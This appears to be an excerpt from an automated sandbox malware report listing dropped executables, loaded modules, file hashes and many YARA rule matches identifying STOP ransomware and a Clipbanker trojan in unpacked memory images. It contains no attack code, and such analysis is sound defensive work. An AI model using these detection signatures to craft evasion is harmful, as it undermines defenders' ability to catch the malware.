Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00417872	5_2_00417872
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00417452	5_2_00417452
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00416C72	5_2_00416C72
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00411511	5_2_00411511
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00413733	5_2_00413733
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0041DF86	5_2_0041DF86
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0041679D	5_2_0041679D
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0040BFAB	5_2_0040BFAB

Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Section loaded: windowscodecs.dll

Source: XandETC.exe.40.dr

Static PE information: Number of sections : 11 > 10

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe A96E080EE195FB2333191FB38C7A66E0C0BD029AF6480DC489A8C8113E5B03A9

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 39.2.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 39.2.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 35.0.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.0.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 35.2.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 39.0.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 39.0.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
